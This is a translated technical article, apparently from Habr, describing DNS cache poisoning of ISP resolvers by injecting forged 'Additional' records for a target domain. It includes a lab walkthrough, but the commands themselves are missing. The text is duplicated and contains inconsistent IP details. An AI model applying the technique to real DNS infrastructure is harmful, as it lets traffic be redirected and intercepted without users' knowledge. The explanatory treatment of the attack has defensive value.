Infecting the cache of the DNS servers of providers due to the manipulation of DNS responses from legitimate reputable DNS servers
A serious problem of modernity is the IS network threats, that is, classes of threats implemented using interworking protocols. One of these protocols is the Domain Name System Protocol - DNS.
Threats that use the domain name system include threats based on modifying DNS transaction packets and aimed at creating a spurious route on the network. Their potential danger lies in the possibility of intercepting data transmitted between clients of network services and servers of these services.
It is rather difficult to track modification of DNS transaction packages, with a potentially high risk of implementing attacks in information systems, therefore such attacks as:
')
The topic of infecting the cache of the DNS servers of providers has long been crawled, however, using a practical example, we will show how simple it is to make clients of a particular Internet service provider “go” to the IP address we need, instead of the correct one, for a given domain without hacking anything and infecting trojans, thereby giving us full control over the traffic associated with a specific DNS zone.
Imagine a fragment of the global Internet from client PC to a remote web service, as well as other network elements related to the domain name system
A typical computer network that implements the substitution of an IP address for a target domain consists of the following elements:
For the successful implementation of our plan, it is necessary to fulfill a number of conditions:
To initiate the monitoring process, it is necessary to make a request to resolve the DNS name from the zone for which the monitored DNS server is responsible. Due to this, it is possible to generate a DNS response to the received request with the specified parameters.
According to the recommendations of RFC 1034, RFC 1035, which establish the order of operation, specification and use of the domain name system, the addition of so-called “Additional” fields is allowed when generating a DNS response. These fields are required to record the IP addresses of auxiliary nodes of various types, including to prevent repeated access to the DNS server in cases where, for certain reasons, the primary node whose record is transmitted in the “Answer” field is unavailable. If the proposed approach is applied, the “Additional” field records the IP address that corresponds to the domain name of the target information service, but actually belongs to the monitoring point - the firewall.
Such a task (adding the field we need) can be assigned to a script that simulates the operation of a legitimate DNS server responsible for any DNS zone, and no matter what level ...
After the Internet service provider’s (ISP) caching DNS server receives a DNS response in the process of resolving a given DNS name, then if there are no entries in its cache with the corresponding entries from the additional DNS response fields, it places these entries in the cache memory. Thus, records that match the domain names of the information services to be monitored and the IP addresses belonging to the monitoring point are placed in the DNS provider's DNS server cache. From this point on, if the client generates a DNS request for resolving the host name of the target information service with a domain name stored in the provider's cache and stored from additional fields received after processing the DNS query of the "auxiliary" client, the Internet DNS server provider generates and sends a DNS response to the client based on data from its cache.
Thus, the client obtains the resolution of the domain name of the requested information service with the IP address obtained from the monitored DNS server and stored by the Internet provider in the provider’s cache at the time the client’s request is processed. The IP address does not belong to the target information service requested by the client, but to the monitoring point. Accordingly, further, the client accesses the target information service on the IP address belonging to the monitoring point.
When a client accesses a received IP address to a monitoring point, in which, based on the predefined parameters of the network security policy, a number of control actions are performed. These actions include:
At the monitoring point - ITU, network address translation (Network Address Translation - NAT) is performed, which makes it possible to ensure its “transparent” operation from the point of view of the client and the target information service.
The verification of the presented investigations was carried out using a test bench in the form of a computer network with the following elements:
Between all objects of a computer network network interaction is configured. The principle of the computer network is as follows.
Between DNS servers, zone transfer is configured in such a way that when receiving a request to resolve a domain name from a zone for which another DNS server is responsible, the current DNS server generates and sends a repeated DNS request to it and, having received a response from it, generates and sends a DNS response to the client that generated the first request, at the same time placing in its cache memory the response from the second DNS server. Thus, the operation of the ISP's DNS server is simulated.
At the 1st stage, the script “fakedns” is launched on the DNS server responsible for the zone “.b”, which implements the work of the DNS switch. The task of the script is to process the received DNS request for the resolution of a domain name from the ".b" zone and add to the DNS response an additional "Additional" field for the specified domain name (in the example, "victim.com") corresponding to the target information service for which The client will monitor and manage the security of the network interaction with the client, and with the specified IP address (in the example, “10.0.33.13”), the corresponding monitoring point — the firewall. Running the “fakedns” script with the specified parameters, simulating the operation of the DNS switch, is carried out ** by the command **
At the 2nd stage, a DNS query for the domain name “test.b” is generated and transmitted from the client to the domain name system, consisting of the DNS server “ns.a” and the DNS server “ns.b”. In this case, the primary DNS server (DNS server of the Internet provider) for the client is the DNS server “ns.a”.
At the 3rd stage, a DNS response is generated and transmitted for the domain name “test.b” with an additional field “Additional” and the specified domain name “victim.com”, corresponding to the information service, which is assigned the specified IP address “10.0.33.13 "Corresponding to the monitoring point.
At the 4th stage, the DNS server “ns.a” of the domain name “victim.com” corresponding to the information service, but with the IP address corresponding to the monitoring point “10.0.33.13”, is checked in the cache memory.
Verification is done by the command
At the 5th stage, a response is received about the presence in the cache memory of the DNS server “ns.a” of the domain name “victim.com”.
Obviously, when the client continues to call the victim.com site by IP address from the received DNS response, the call will be made to the IP address specified in the parameters to the fakedns script and the corresponding monitoring point, the firewall.
This fact is verified by the command
Based on the presented materials of the experiment, it can be concluded that, if the listed conditions are met and an additional field “Additional” is added in the DNS switch, when processing a request for resolving the domain name of the target information service, it becomes possible to monitor the client’s network interaction with the specified information services depending on their location and computer network topology. In addition, it becomes possible to monitor and control the client’s network interaction with specified information services both at the stage of establishing a connection session and at the stage of information exchange, which is not good ...
Threats that use the domain name system include threats based on modifying DNS transaction packets and aimed at creating a spurious route on the network. Their potential danger lies in the possibility of intercepting data transmitted between clients of network services and servers of these services.
It is rather difficult to track modification of DNS transaction packages, with a potentially high risk of implementing attacks in information systems, therefore such attacks as:
')
- network traffic analysis;
- substitution of a trusted network object;
- imposing a false route;
- the introduction of a false network object.
The topic of infecting the cache of the DNS servers of providers has long been crawled, however, using a practical example, we will show how simple it is to make clients of a particular Internet service provider “go” to the IP address we need, instead of the correct one, for a given domain without hacking anything and infecting trojans, thereby giving us full control over the traffic associated with a specific DNS zone.
Imagine a fragment of the global Internet from client PC to a remote web service, as well as other network elements related to the domain name system
A typical computer network that implements the substitution of an IP address for a target domain consists of the following elements:
- Client PC (Client).
- Internet provider (consisting of: caching DNS server, gateway).
- Auxiliary client.
- Domain Name System.
- Monitoring point (firewall, filter, proxy server).
- Information service server.
For the successful implementation of our plan, it is necessary to fulfill a number of conditions:
- There is a controlled DNS server that is responsible for any (any) zone of the domain name system.
- The client is served by an ISP with a caching DNS server, or another DNS server is known, whose services are used by the client, and this server is caching.
- At the time of receiving the DNS response from the monitored DNS server, there is no record in the cache of the DNS server of the ISP with the target DNS name of the information service node.
- At the monitoring point, there is a base of IP addresses and domain names of target information services, which are monitored and managed by the network interaction with the client.
To initiate the monitoring process, it is necessary to make a request to resolve the DNS name from the zone for which the monitored DNS server is responsible. Due to this, it is possible to generate a DNS response to the received request with the specified parameters.
According to the recommendations of RFC 1034, RFC 1035, which establish the order of operation, specification and use of the domain name system, the addition of so-called “Additional” fields is allowed when generating a DNS response. These fields are required to record the IP addresses of auxiliary nodes of various types, including to prevent repeated access to the DNS server in cases where, for certain reasons, the primary node whose record is transmitted in the “Answer” field is unavailable. If the proposed approach is applied, the “Additional” field records the IP address that corresponds to the domain name of the target information service, but actually belongs to the monitoring point - the firewall.
Such a task (adding the field we need) can be assigned to a script that simulates the operation of a legitimate DNS server responsible for any DNS zone, and no matter what level ...
After the Internet service provider’s (ISP) caching DNS server receives a DNS response in the process of resolving a given DNS name, then if there are no entries in its cache with the corresponding entries from the additional DNS response fields, it places these entries in the cache memory. Thus, records that match the domain names of the information services to be monitored and the IP addresses belonging to the monitoring point are placed in the DNS provider's DNS server cache. From this point on, if the client generates a DNS request for resolving the host name of the target information service with a domain name stored in the provider's cache and stored from additional fields received after processing the DNS query of the "auxiliary" client, the Internet DNS server provider generates and sends a DNS response to the client based on data from its cache.
Thus, the client obtains the resolution of the domain name of the requested information service with the IP address obtained from the monitored DNS server and stored by the Internet provider in the provider’s cache at the time the client’s request is processed. The IP address does not belong to the target information service requested by the client, but to the monitoring point. Accordingly, further, the client accesses the target information service on the IP address belonging to the monitoring point.
When a client accesses a received IP address to a monitoring point, in which, based on the predefined parameters of the network security policy, a number of control actions are performed. These actions include:
- Analysis of the transaction received from the client.
- Development and application of control actions.
- Audit of received transactions and actions taken.
- Formation of a request for an information service based on the data of the received client transaction
At the monitoring point - ITU, network address translation (Network Address Translation - NAT) is performed, which makes it possible to ensure its “transparent” operation from the point of view of the client and the target information service.
The verification of the presented investigations was carried out using a test bench in the form of a computer network with the following elements:
- DNS server based on the BIND 9.4 software, which is responsible for the zone ".a", with the domain name "ns.a".
- DNS server based on the BIND 9.4 software, which is responsible for the ".b" zone, with the domain name "ns.b".
- Client PC with IP Address 10.0.33.13.
- The monitoring point is a firewall with an IP address of 10.0.33.13.
Between all objects of a computer network network interaction is configured. The principle of the computer network is as follows.
Between DNS servers, zone transfer is configured in such a way that when receiving a request to resolve a domain name from a zone for which another DNS server is responsible, the current DNS server generates and sends a repeated DNS request to it and, having received a response from it, generates and sends a DNS response to the client that generated the first request, at the same time placing in its cache memory the response from the second DNS server. Thus, the operation of the ISP's DNS server is simulated.
At the 1st stage, the script “fakedns” is launched on the DNS server responsible for the zone “.b”, which implements the work of the DNS switch. The task of the script is to process the received DNS request for the resolution of a domain name from the ".b" zone and add to the DNS response an additional "Additional" field for the specified domain name (in the example, "victim.com") corresponding to the target information service for which The client will monitor and manage the security of the network interaction with the client, and with the specified IP address (in the example, “10.0.33.13”), the corresponding monitoring point — the firewall. Running the “fakedns” script with the specified parameters, simulating the operation of the DNS switch, is carried out ** by the command **
At the 2nd stage, a DNS query for the domain name “test.b” is generated and transmitted from the client to the domain name system, consisting of the DNS server “ns.a” and the DNS server “ns.b”. In this case, the primary DNS server (DNS server of the Internet provider) for the client is the DNS server “ns.a”.
Query structure
At the 3rd stage, a DNS response is generated and transmitted for the domain name “test.b” with an additional field “Additional” and the specified domain name “victim.com”, corresponding to the information service, which is assigned the specified IP address “10.0.33.13 "Corresponding to the monitoring point.
DNS response packet structure
At the 4th stage, the DNS server “ns.a” of the domain name “victim.com” corresponding to the information service, but with the IP address corresponding to the monitoring point “10.0.33.13”, is checked in the cache memory.
Verification is done by the command
At the 5th stage, a response is received about the presence in the cache memory of the DNS server “ns.a” of the domain name “victim.com”.
DNS response structure
Obviously, when the client continues to call the victim.com site by IP address from the received DNS response, the call will be made to the IP address specified in the parameters to the fakedns script and the corresponding monitoring point, the firewall.
This fact is verified by the command
Based on the presented materials of the experiment, it can be concluded that, if the listed conditions are met and an additional field “Additional” is added in the DNS switch, when processing a request for resolving the domain name of the target information service, it becomes possible to monitor the client’s network interaction with the specified information services depending on their location and computer network topology. In addition, it becomes possible to monitor and control the client’s network interaction with specified information services both at the stage of establishing a connection session and at the stage of information exchange, which is not good ...
Source: https://habr.com/ru/post/321150/
All Articles